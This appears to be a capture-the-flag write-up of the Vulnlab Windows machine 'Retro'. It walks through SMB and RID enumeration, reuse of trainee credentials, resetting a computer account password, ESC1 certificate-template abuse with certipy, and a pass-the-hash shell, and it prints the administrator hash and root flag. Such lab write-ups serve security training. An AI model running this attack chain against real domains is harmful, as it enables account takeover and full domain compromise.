Vulnlab Windows Easy: Retro
Retro is an Easy rated Windows machine on Vulnlab.
Vulnlab Windows Easy: Retro
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -Pn -p- 10.10.89.171
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-01-30 12:57 CET
Nmap scan report for 10.10.89.171
Host is up (0.026s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-30 12:07:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| DNS_Tree_Name: retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-01-30T12:07:49+00:00
|_ssl-date: 2024-01-30T12:08:29+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-01-29T11:54:01
|_Not valid after: 2024-07-30T11:54:01
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
49867/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-30T12:07:54
|_ start_date: N/A
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 643.80 seconds
Add domain & FDQN of the DC to the hosts file.
1
2
3
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts | grep 10.10.89.171
10.10.89.171 retro.vl dc.retro.vl
Enumerate SMB (Port 139/445)
List SMB shares.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\\\\\10.10.89.171\\\\
Password for [WORKGROUP\\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Notes Disk
SYSVOL Disk Logon server share
Trainees Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.89.171 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Retrieve files.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\\\\\10.10.89.171\\\\Trainees
Password for [WORKGROUP\\kali]:
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Sun Jul 23 23:58:43 2023
.. DHS 0 Wed Jul 26 11:54:14 2023
Important.txt A 288 Mon Jul 24 00:00:13 2023
6261499 blocks of size 4096. 2222554 blocks available
smb: \\> get Important.txt
getting file \\Important.txt of size 288 as Important.txt (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
Content of the text file (possible trainees username?).
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
User enum
Enumerate users using impacket-lookupsid.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[~]
└─$ impacket-lookupsid anonymous@10.10.89.171
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Brute forcing SIDs at 10.10.89.171
[*] StringBinding ncacn_np:10.10.89.171[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\\Administrator (SidTypeUser)
501: RETRO\\Guest (SidTypeUser)
502: RETRO\\krbtgt (SidTypeUser)
512: RETRO\\Domain Admins (SidTypeGroup)
513: RETRO\\Domain Users (SidTypeGroup)
514: RETRO\\Domain Guests (SidTypeGroup)
515: RETRO\\Domain Computers (SidTypeGroup)
516: RETRO\\Domain Controllers (SidTypeGroup)
517: RETRO\\Cert Publishers (SidTypeAlias)
518: RETRO\\Schema Admins (SidTypeGroup)
519: RETRO\\Enterprise Admins (SidTypeGroup)
520: RETRO\\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\\Protected Users (SidTypeGroup)
526: RETRO\\Key Admins (SidTypeGroup)
527: RETRO\\Enterprise Key Admins (SidTypeGroup)
553: RETRO\\RAS and IAS Servers (SidTypeAlias)
571: RETRO\\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\\DC$ (SidTypeUser)
1101: RETRO\\DnsAdmins (SidTypeAlias)
1102: RETRO\\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\\trainee (SidTypeUser)
1106: RETRO\\BANKING$ (SidTypeUser)
1107: RETRO\\jburley (SidTypeUser)
1108: RETRO\\HelpDesk (SidTypeGroup)
1109: RETRO\\tblack (SidTypeUser)
User file:
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ cat users
krbtgt
trainee
BANKING$
jburley
tblack
HelpDesk
SMB enum
As the note mentioned we can now try to list new shares using the credentials: trainee:trainee.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[~]
└─$ smbmap -u "trainee" -p "trainee" -H 10.10.89.171
________ ___ ___ _______ ___ ___ __ _______
/" )|" \\ /" || _ "\\ |" \\ /" | /""\\ | __ "\\
(: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)
\\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/
__/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /
/" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\
(_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
<https://github.com/ShawnDEvans/smbmap>
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.89.171:445 Name: retro.vl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Notes READ ONLY
SYSVOL READ ONLY Logon server share
Trainees READ ONLY
Retrieve content from the Notes share.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ smbclient -U "trainee" \\\\\\\\10.10.89.171\\\\Notes
Password for [WORKGROUP\\trainee]:
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Mon Jul 24 00:03:16 2023
.. DHS 0 Wed Jul 26 11:54:14 2023
ToDo.txt A 248 Mon Jul 24 00:05:56 2023
6261499 blocks of size 4096. 2246987 blocks available
smb: \\> get ToDo.txt
getting file \\ToDo.txt of size 248 as ToDo.txt (2.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)
Content of ToDo.txt.
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
Earlier, we found the BANKING$ computer account, let’s try to change its password using impacket.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ impacket-changepasswd retro.vl/banking$:banking@10.10.89.171 -altuser trainee -altpass trainee -newpass 'password123!'
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Attempting to *change* the password of retro.vl/banking$ as retro.vl/trainee. You may want to use '-reset' to *reset* the password of the target.
[*] Changing the password of retro.vl\\banking$
[*] Connecting to DCE/RPC as retro.vl\\trainee
[*] Password was changed successfully.
Enumerate certs
Since we can’t use these credentials to authenticate via SMB or WinRM, we can instead try to list certificates.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
┌──(kali㉿kali)-[~]
└─$ certipy find -vulnerable -u 'BANKING$'@retro.vl -p 'password123!' -dc-ip 10.10.89.171 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\\Administrators
Access Rights
ManageCertificates : RETRO.VL\\Administrators
RETRO.VL\\Domain Admins
RETRO.VL\\Enterprise Admins
ManageCa : RETRO.VL\\Administrators
RETRO.VL\\Domain Admins
RETRO.VL\\Enterprise Admins
Enroll : RETRO.VL\\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\\Domain Admins
RETRO.VL\\Domain Computers
RETRO.VL\\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\\Administrator
Write Owner Principals : RETRO.VL\\Domain Admins
RETRO.VL\\Enterprise Admins
RETRO.VL\\Administrator
Write Dacl Principals : RETRO.VL\\Domain Admins
RETRO.VL\\Enterprise Admins
RETRO.VL\\Administrator
Write Property Principals : RETRO.VL\\Domain Admins
RETRO.VL\\Enterprise Admins
RETRO.VL\\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
We can now request the administrator private key.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~]
└─$ certipy-ad req -u 'banking$'@retro.vl -p 'password123!' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator@retro.vl' -dns 'dc.retro.vl' -key-size 4096 -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc.retro.vl' at '195.130.130.4'
[+] Trying to resolve 'RETRO.VL' at '195.130.130.4'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.89.171[\\pipe\\cert]
[+] Connected to endpoint: ncacn_np:10.10.89.171[\\pipe\\cert]
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with multiple identifications
UPN: 'administrator@retro.vl'
DNS Host Name: 'dc.retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_dc.pfx'
Admin shell
Since we have the administrator PFX file we can request his NTLM hash.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~]
└─$ certipy-ad auth -pfx administrator_dc.pfx -dc-ip 10.10.89.171
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@retro.vl'
[1] DNS Host Name: 'dc.retro.vl'
> 0
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
Pass-the-hash using evil-winrm to gain a shell as the administrator user.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ evil-winrm -u administrator -H "252fac7066d93dd009d4fd2cd0368389" -i 10.10.89.171
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> whoami
retro\\administrator
Root flag: VL{8b13de0d077813ff16c5e792186bdde4}
1
2
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> type root.txt
VL{8b13de0d077813ff16c5e792186bdde4}
This post is licensed under CC BY 4.0 by the author.